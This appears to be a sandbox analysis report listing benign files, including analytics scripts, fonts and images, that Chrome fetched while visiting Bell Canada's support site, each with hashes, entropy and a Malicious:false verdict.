                                                                                                                                                                                                                                                                                                                                      Preview:wOF2......-.......h...-5........................?FFTM.......@.`..B.....,....~..6.$..v. .....C..S%l\-.q.P..Q.%R.............k..0gRR...Xtc..EI&..x.O.c.thT.kK..*i.'Y...M...@.../n].M.....Or.`..bD .V.."....H*......[.9W..p....z..#...@...~P!...P....vjT.!.X...!...58.......]....9\.>..`.....Z...$BY......"z......a7......I..9.j. ..Yr,O..j....k..l..h......D1.f...\...8...i.....%>......k......../..,.q..l.ZI.lYI.%y=;....N.K.#..'..x.ye.;.cy..>.....u....R.../...oB.R......)[..VK-7.!.my.E.B...i.S.{..4...c....2..h'.U,X-..n..@..>..?...{."..x../@....p.......+.\D..7&..'....~... >.v.@:....GC....m..O..*j........c.3.e3.A....z;...|.}.f:'r1k[\. ..r...r...:j....Yrb..s9.....Z8].r.8I..n...+.5.j....{U;...c....V.:...X.r.........$c.r.E.g..9..N)..b.PE....^.....v.c.}e..,b..8.P9..%.-....q.)..q6...K..rcW.}......z...r..p)..0OP%'....a....8.U...j.B_6.r.%.;.{...F....%..DE... .AKG_.o.D....k_..~.1...t..#...~-..4N.ig.-.......v...N^.7..O..J..m...HM..Ox........:.F./%.T..J.......xG'.uB..t~
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):5430
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.507783608405071
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:YhHizFggggggggggggggqDbbWKirckevvvvvvvvvvvvvvvvvvvvvvvvvvvvvvzg4:mHizibbWKigk
                                                                                                                                                                                                                                                                                                                                      MD5:71E639807DD6F7BD6D9382624B837574
                                                                                                                                                                                                                                                                                                                                      SHA1:2A6AFCB240F07F37794E1D9C34DBE5D673C738B4
                                                                                                                                                                                                                                                                                                                                      SHA-256:5C82B38E75516678C187C1CB7003482CFFD310BF384207EA539CED9AF87D6D92
                                                                                                                                                                                                                                                                                                                                      SHA-512:C9193804E6587F4380044A2024854BCD8E71A937BBAAA96CDB493CDB0D1911C9DB04974FA9EDC1C5A2E04A659A007A9FDC5DCA3B13D98EC4B70F4A0D92EF8616
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:............ .h...&... .... .........(....... ..... ..........................h...h...h...h...h...h...h...h...h...h...h...h...h...h...h...h...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...j...j...j...j...j...j...j...j...j...j...j...j...j...j...j...j...l...l...l...l...l...l...l...l...r"..o...l...l...l...l...l...l...n......................w*....................z.........n...q!.........q!...N..............z...t%..y.......|.........q!..s%.........s%..t%..............................~.........s%..v)............................`..}....................v)..x,...................z/.............x................x,..z0..........z0.........z0..z0..z0..z0..z0................z0..}4...................}4..}4..}4..}4..}4................}4...8...m.........f...8...8...8...8...8...8......a......g...8...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...;...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...@...@...@...@...@...@...
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65441), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):65959
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.353413306184177
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:ZSDqeR7solr3roUzaOGjIj7KkIe0McOYkyJ+nM1Em87o6dHhMHKvOW4QES3OII:cDBFsolr3r7N5yJ+nwENFnESeII
                                                                                                                                                                                                                                                                                                                                      MD5:E4B2C9B152E972CACB77265A161CD311
                                                                                                                                                                                                                                                                                                                                      SHA1:EDD9F41FFFB57C51B7C2B50D4732A61039FF308E
                                                                                                                                                                                                                                                                                                                                      SHA-256:09FA04E84D7038CC32F19BEDCBA454B9E637A35F4DE496E8EC9148C47550F0FC
                                                                                                                                                                                                                                                                                                                                      SHA-512:4263D9EFE7D369A364F785E11BFFBFEA139A1B5CBD129A84E745AAB8F8A1D254EC204963E09CA18365AD851F7491C1F7A61EE28CEB24E7CFF87E4358B8F15069
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://www.clarity.ms/s/0.7.49/clarity.js
                                                                                                                                                                                                                                                                                                                                      Preview:/* clarity-js v0.7.49: https://github.com/microsoft/clarity (License: MIT) */..!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return sr},get start(){return cr},get stop(){return lr},get track(){return ar}}),e=Object.freeze({__proto__:null,get clone(){return Cr},get compute(){return Dr},get data(){return Er},get keys(){return Or},get reset(){return Ar},get start(){return _r},get stop(){return Rr},get trigger(){return Ir},get update(){return jr}}),n=Object.freeze({__proto__:null,get check(){return Xr},get compute(){return qr},get data(){return Sr},get start(){return Wr},get stop(){return Ur},get trigger(){return Yr}}),a=Object.freeze({__proto__:null,get compute(){return Kr},get data(){return Fr},get log(){return Gr},get reset(){return Zr},get start(){return Br},get stop(){return Jr},get updates(){return Vr}}),r=Object.freeze({__proto__:null,get callbacks(){return $r},get clear(){return ui},get consent(){return oi},get data(){return Qr},get electron(){return ti},
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1629)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):341434
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.610140131068381
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:mrl40frXFUOOkXyh4S/J8ME9ifUUIcNUzNcCs+SOHw2aN:mre6/OkXyhR9E9+Uj26BsKo
                                                                                                                                                                                                                                                                                                                                      MD5:AE7E05FE0E966FA7253CD6AE563F5BAE
                                                                                                                                                                                                                                                                                                                                      SHA1:EE45D718FC726C997E339A54F0B06DDEC096F024
                                                                                                                                                                                                                                                                                                                                      SHA-256:949B63051BA550CABCF8541D921703F31FEAEF9506D7D45096C43C24A5C9B3E9
                                                                                                                                                                                                                                                                                                                                      SHA-512:56B33ED92FC98F7060DD175B62584D657E7CFC275E034F0A99C9E4680EFB782913CFEFCC81B1211DD6CD433B77F95A57E7C9CF7E70DE25BCCF29C2AE8E9B99F5
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/*. Copyright and licenses see https://www.dynatrace.com/company/trust-center/customers/reports/ */.(function(){function Ka(){document.cookie="".concat("__dTCookie","=").concat("1",";SameSite=Lax");var Oa=document.cookie.includes("__dTCookie");document.cookie="".concat("__dTCookie","=").concat("1","; expires=Thu, 01-Jan-1970 00:00:01 GMT");return Oa}function fb(){return void 0===cb.dialogArguments?navigator.cookieEnabled||Ka():Ka()}function mb(){var Oa;if(fb()){var Pa=cb.dT_,Wa=null===Pa||void 0===Pa?void 0:Pa.platformPrefix;if(!Pa||Wa){var Ra=null===Pa||void 0===Pa?void 0:Pa.minAgentVersion;Ra&&."10299241001084140"<Ra+""?window.console.log("[CookiePrefix/initConfig] Min agent version detected, and javascript agent is older - the javascript agent will not be initialized!"):(Ra=(Oa={},Oa.cfg="#CONFIGSTRING#|auto=#AUTO#|domain=#DOMAIN#|rid=RID_#REQUEST_ID#|rpid=#RESPONSE_ID#|app=#APP#",Oa.iCE=fb,Oa.platformCookieOffset=null===Pa||void 0===Pa?void 0:Pa.platformCookieOffset,Oa),Wa&&(Ra.pla
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (15608), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):15608
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1626936985974226
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:idGlyeNWeLGWkY7kYvHIV7rtV7LML9kMJQ2n/eqb5X:uLJEahtJsJDdVX
                                                                                                                                                                                                                                                                                                                                      MD5:A2661EB200472ED6299C7937A94360E7
                                                                                                                                                                                                                                                                                                                                      SHA1:D95CF4707E5D5647ADE4FDA2F0ACCFBB46096FC9
                                                                                                                                                                                                                                                                                                                                      SHA-256:1303BA60D1F710CBE1DFC4B1FCF1DAAF9D65805B167CB296A499BE7B101A4993
                                                                                                                                                                                                                                                                                                                                      SHA-512:FD5F4FAE149B7C38060D7DA606D27174D6DAC43E2928DD10630A38844F8DD2657BEE781C0FCEEBEA40B0196010D98896A1C923F6453EC125DAFC87E8DF189309
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Web/MYB/custom/js/eChat/echat-omniture.min.js?ver=00000000
                                                                                                                                                                                                                                                                                                                                      Preview:var omnitureInterval, counter = !1, proActiveCounter = !1, newSessionAgent = !1, newSessionMsg = !1, newSessionMinimize = !1, newSessionStartOver = !1, newSessionChatTranscript = !1, newSessionClose = !1, newSessionsocketConnected = !1, chatdetails = ""; function getOmnitureCookie(e) { var t = {}; return document.cookie.split(";").forEach(function (e) { var n = e.split("=")[0], i = e.substring(e.split("=")[0].length + 1); t[n.trim()] = i }), t[e] } var socketConnected = "", isChatOpen = "", isChatAgentConnected = "", chatId = "", engagementId = "", chatEngineType = "", clickedStartOver = !1, isChatActive = "", chatEntry = "", pageCategory = "", isProactive = "", proactiveType = "", omnitureCookieNames = ["__csomni", "__ceidomni", "__cacomni", "__cminomni", "__cromni", "__ctromni", "__cepomni", "__cpcpomni", "__cabomni", "__cpaomni"]; setInterval(function () { var e = void 0 !== getOmnitureCookie("__eccomp"), t = e ? readCookieContentById("eccompslex", "__cwss") : getOmnitureCookie("__c
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):93
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.897114354329914
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREayqXXl6E81CSHI:UrXiuqX1IRo
                                                                                                                                                                                                                                                                                                                                      MD5:F2525211FE87A48B05764869C806D3D5
                                                                                                                                                                                                                                                                                                                                      SHA1:95C2F2CEB86FCA0F0C080064B1DAE7BE44E8DE81
                                                                                                                                                                                                                                                                                                                                      SHA-256:2F95B658A1267E54F82CDCAAF627944FA5B022CF6F18151C3F5CC7106C6F66B7
                                                                                                                                                                                                                                                                                                                                      SHA-512:83179BC719860EFCD912CEDA383BA74BADF960CE9A8D67EC7D39725A5775076D949F5A63DE90B36DB2E4728D35454A0E280EAA020F7BF6C84E466798AFA4BDC8
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__11 === 'function' && branch_callback__11("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:gzip compressed data, was "build.min.js", last modified: Wed Apr 10 21:27:41 2024, from Unix, original size modulo 2^32 76432
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):23431
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.989595175333573
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:wqd7ldoHsoBpEGtKTtoUyrmhtwX0NclNN8oR8miptv0Em0670Wn7HKDfTX/4mRLR:37luTBBtaoUuXENcvN383pLmrv7Hu/4Q
                                                                                                                                                                                                                                                                                                                                      MD5:F4EC9657A3DC111D088E2ECA7B9796A4
                                                                                                                                                                                                                                                                                                                                      SHA1:09C35D743B3BEEA77182EDD32741C7FD8DA7C6F5
                                                                                                                                                                                                                                                                                                                                      SHA-256:26CE152A459AA437F10161A8D3AA8BDF3D7219F1E082896897EB96F305822EEA
                                                                                                                                                                                                                                                                                                                                      SHA-512:CE6A632376579C38CB4D7F095390E50D52AFB5C628A032A1C8A301A76A79D284C751B4908DDE0A3F8BDEA21DC6AED926BB709EFB7DE5E2A1D8ADABE09BF8D8E2
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://cdn.branch.io/branch-latest.min.js
                                                                                                                                                                                                                                                                                                                                      Preview:....M..f..build.min.js..y_..0.?.Bhr.4..&.,R...H.L..H23...Zl.l.X6K..g.....nI.f.9.y~.w...^.....j.?.G.4.[.q......M....tf..&..0....x..S6.6...l..+......o.(....^..gi?M...5a.i...W..X.`S.....A0..$Y...~M...'.t..O.I2..I.mJ...~2't".&.[,...Sv.N..,C....&....4..c...8<."..../S...m..b.....`.}......N.|m...0.V.2.......[..a.m....q.....M-..0h..s....`v.Z.}..Q.#.a*....}.f.A...!G...4.4v.S.en..8..0..h..]....d.....f.+...'..<..'..`>...a:.L.@.......z.[-...:.S.W..H....N.v.........<....1$..?.B+..p5......p5....."X..(....|..a...i:..i..pa/.0...1n:...8.M..0.F"G...Gh..3..0.|......l...kkV...[..c.....oo.4O...dVD........U........qD.... ......V.VD,.j{!~t...D..."..Fl8t.d2......8l:..`....\.>S..*.U,..;..zbprj....DP.VQ....+.@....j..8?M.31.....H...0..j..2!.bBN..9e.+....S....Y]...2..6.\.\}.[.....81.n...d.Oe....>..{......@...0k.\._...U...Y:.L..G.....N..........S.$|..N.y..5...._.4..@&$:..sK.. .M.5L...}......................rb.A..2.w...~>..i%.e...6....s..E.V.s...=.M.C..1.).?\..i..5.4.M..B
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (33379), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):33379
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1065918509650805
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:GKqZzz8X21jF2Vn8LJMurwD+l4hj+zIOGWsWEawZq2xyDHgLX/jg:eL3+n1EwDvrPWs+2qF
                                                                                                                                                                                                                                                                                                                                      MD5:41F4301D02B2889FB4D8A8067F350768
                                                                                                                                                                                                                                                                                                                                      SHA1:5CD52BAD684A3D554B40C2D56953EE69C473B3A0
                                                                                                                                                                                                                                                                                                                                      SHA-256:F4AF2A9C01F60CAF9FEFCA07A215E65AAEBB13A3144FE6E21DC4B9B1C18480E7
                                                                                                                                                                                                                                                                                                                                      SHA-512:71CD9E96B39E5310946AE5D1456CAAAEE888910208BADEB2B078A4D9955C18110B46DEB05632CAC4ED9954DA612CB2B35D56E03775A5E66514E48074251F2729
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:var BELL = function (e) { return e.gConnector.utils = { cookieManager: { setLanguageRegionCookieValue: function (e, t, n, o) { var i = "gemini", a = 1 == o ? null : BELL.gConnector.utils.cookieManager.getCookie(i), c = BELL.gConnector.utils.cookieManager.getGeminiString(e, t, a, n), l = ".bell.ca"; window.location.hostname.toLowerCase().indexOf("virginmobile.ca") > -1 && (l = ".virginmobile.ca"), BELL.gConnector.utils.cookieManager.setCookie(i, c, 90, l) }, getGeminiString: function (e, t, n, o) { var i = "region=" + t + "|language=" + e + "|province=" + t + "|LarSegmentType=" + o; if (null != n) { var a = n.split("|"); null != t && 0 != t.length && (a[0] = "region=" + t, a[2] = "province=" + t), null != e && 0 != e.length && (a[1] = "language=" + e), null != o && null != o && 0 != o.length && (a[3] = "LarSegmentType=" + o), i = a[0] + "|" + a[1] + "|" + a[2] + "|" + a[3] } return i }, getCookie: function (e) { var t = ("; " + document.cookie).split("; " + e + "="); if (2 == t.length)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (774)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):43211
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.519539023318683
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:0W+FIMt+5FdAPnMhpn2g6IKO9yZI92tMujTXOyrbARaLPk6TO3Am8biK4gZK/Xf+:0Wz/pKC9qng6T3WKXK/XfNPhNREhSQ
                                                                                                                                                                                                                                                                                                                                      MD5:DA800C7A6725ACD0F789BD737CF188FF
                                                                                                                                                                                                                                                                                                                                      SHA1:C3B1073526101A7490744695BFCD2871ABBFFB04
                                                                                                                                                                                                                                                                                                                                      SHA-256:7A28F558E497F8ECEBC8242CCBA48DE0E9CB6A1D9A49A2DAF020935EA9449E27
                                                                                                                                                                                                                                                                                                                                      SHA-512:3C14202920560B97D1D7D9050168DCA5F5DF3289E09148AF6AB73D74A4D3EE0F88E0E37D26B204A37F840BEB5550A69DF51F6EC9BCDD6B7AE714FDC2EAB4938A
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/ruxitagentjs_D_10299241001084140.js
                                                                                                                                                                                                                                                                                                                                      Preview:(function dn(){function fb(u,t){return Wa(u)&&"href"===t?1:Za(u)&&"value"===t?32:qc.Qd.some(function(A){return A.test(t)})?16:Pa(u)&&"value"===t?2===mb(u)?16:1:1}function mb(u){if(Ra(u)||Ra(u.parentNode))return 1;qd.has(u)&&Yc.set(u,Yc.get(u)|8);ad.has(u)&&Yc.set(u,Yc.get(u)|2);uc.has(u)&&(qc.qb?kd.set(u,kd.get(u)|1):kd.set(u,kd.get(u)|4));La(u)&&u.hasAttribute("data-dtrum-mask")&&(Oa(u)?kd.set(u,kd.get(u)|4):Yc.set(u,Yc.get(u)|10));if(Yc.has(u))return Yc.get(u);if(kd.has(u))return kd.get(u);var t=.u,A=!1;t.nodeType===Node.TEXT_NODE&&(t=t.parentNode,A=!0);var P=Oa(t);var ea=A;void 0===ea&&(ea=!1);ea=!P||ea||"OPTION"===t.nodeName?(P?kd:Yc).get(ea?t:t.parentNode):void 0;var Ma=void 0;P&&cb(qc.ub,t)&&(Ma|=4);!P&&cb(qc.sb,t)&&(Ma|=2);!P&&cb(qc.yb,t)&&(Ma|=8);if(Ma||P)a:if(P=void 0===P?!1:P,A=void 0===A?!1:A,!P&&Ma)ea=Ma;else{if(P){Ma=Ma&&!(Ma&1)||qc.qb?(!Ma||Ma&1)&&qc.qb||Ma&&!(Ma&1)&&!qc.qb?t.parentNode&&Oa(t.parentNode)?ea&&!(ea&1):!0:!1:ea&&!(ea&1);if(A&&Ma){ea=ea?ea:2;break a}if(Ma){ea
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.902793404502967
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiRE9yqXXl6Egd61CSHI:UrXiLqX148Ro
                                                                                                                                                                                                                                                                                                                                      MD5:972567C9D116F8E0DEB971042D678AD9
                                                                                                                                                                                                                                                                                                                                      SHA1:385D9E7A41010C460C126A52430D4983D8950422
                                                                                                                                                                                                                                                                                                                                      SHA-256:6A58AE034BF84F8C5EAEA6E3B6771D9C1531CFC441D237BCCE39D71A2CF208C6
                                                                                                                                                                                                                                                                                                                                      SHA-512:9A808DCA5E914B52A744A013C8917EB7E2790F0D180FAB274951B61063AD0EEF492A019442598AD74C066C09361FF988E7D5D79E61848E7DA70CEAC3F0D176C3
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__3
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__3 === 'function' && branch_callback__3("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (701)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):558800
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.6661858145390775
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:HHe/N32Dr0RnSXaKyEtG76ZKj1wa89jzQoDjU3+VLs/k5lS64cflFT3O01d:eMapiBMKZxRflF3d
                                                                                                                                                                                                                                                                                                                                      MD5:88A5FED5C87B1D3704AB225CFBE7A130
                                                                                                                                                                                                                                                                                                                                      SHA1:D64243C18FBAA356E4ABAE8414CCC4772D64060B
                                                                                                                                                                                                                                                                                                                                      SHA-256:F8E5F5CE9FF44073CFF24BCD3D2B8AA4E67B67891B14FF929FE4743880FDF82E
                                                                                                                                                                                                                                                                                                                                      SHA-512:8B8D1C9F4C36FD2383C96D0D484A6692F70422934BCCD3DB1F0787E1B753F7D5A8F0C91934805C4D865AED3D4673FF478F0AE23746D0C0E005E60848543B3D33
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var k=function(){return[function(n,S,D,d,Z,l,h,R,O){return(((n^53)&19)==((n&((((R=[34,2,46],n|72)==n&&(O=St(function(G,A,L){return L=(A=(G=function(f,H){return(f[(H=["replace","indexOf","trim"],H)[1]](d)!=-1&&(f=f.slice(f[H[1]](d))),f)[H[0]](/\s+/g,S)[H[0]](/\n/g,Z)[H[2]]()},G(Z+l)),G(Z+h)),A==L},D)),n)|56)==n&&(h=["https","",0],D=="*"?O="*":(d=g[R[2]](24,!0,h[1],new OI(D)),l=N[30](58,d,h[1]),Z=N[36](25,h[1],g[40](40,l,h[1]),v[21](R[1],1,S,D)),Z.D!=S||(Z.A==h[0]?E[30](90,h[R[1]],443,Z):Z.A=="http"&&.E[30](96,h[R[1]],80,Z)),O=Z.toString())),11))==n&&b.call(this,S),1)&&(O=x[42](16,C[42](44,v[R[0]](23,12),S),[u[20](3
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (677)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):824
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.458929894882583
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:zlujct/BMluTTMM3+SzYI8zlRWxpSTCuNjCxQ:zlrt/BMlyO28zlwDWNWxQ
                                                                                                                                                                                                                                                                                                                                      MD5:B83340A87AC1DFA6623C7E9738E97562
                                                                                                                                                                                                                                                                                                                                      SHA1:53FD22C0B2BC4F522799D005A5915B629093E757
                                                                                                                                                                                                                                                                                                                                      SHA-256:F442AFA4333F16FF33F0526E2D81386D76E8ADABFB4CF94CA6169B4425F0C170
                                                                                                                                                                                                                                                                                                                                      SHA-512:B336C7642A1A4FB8CDB277AC9404DAC85C27FD4539DECF11AA053EB89869D75A9787D4342ED5354B3EA9510B83B6BEA758742D2CA8CB3B986A4E63FD851A79C9
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCa4958c9bb22a442ba8003fb2e6085ec2-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCa4958c9bb22a442ba8003fb2e6085ec2-source.min.js', "try{!function(e,a,n,t,o){var c,d,r;e[o]=e[o]||[],c=function(){var a={ti:\"19004038\"};a.q=e[o],e[o]=new UET(a),e[o].push(\"pageLoad\")},(d=a.createElement(n)).src=t,d.async=1,d.onload=d.onreadystatechange=function(){var e=this.readyState;e&&\"loaded\"!==e&&\"complete\"!==e||(c(),d.onload=d.onreadystatechange=null)},(r=a.getElementsByTagName(n)[0]).parentNode.insertBefore(d,r)}(window,document,\"script\",\"//bat.bing.com/bat.js\",\"uetq\")}catch(e){console.log(\"Adobe Launch: Error: Window Loaded - Bing (Site wide):\",e)}");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 240 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):7907
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.947412513798188
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:rRXhvxZhqdhZZ5/Wfcy1qaHMVcHdDO/10HS2NHEN:r7hOhZr/+cy1qLVc9DO2yYm
                                                                                                                                                                                                                                                                                                                                      MD5:EFE64EF48AE8980C86FB4CFB9AEC6FD0
                                                                                                                                                                                                                                                                                                                                      SHA1:3A270C8AB964E2F74973ED336DFCD79D8C97100E
                                                                                                                                                                                                                                                                                                                                      SHA-256:F0E4FE9C3B9F9AAE87912311237C02FD408F7904B50679761968811574ABC664
                                                                                                                                                                                                                                                                                                                                      SHA-512:701225889C5C3FED5B604F0420AC2D65D3E21AF23F07FC1AF4FE67EB80D48149979A329737F8861E02B638DB7E3981590C6AEBCFFA6635245E737EB46BC742A6
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/_web/images/support/app_store.png
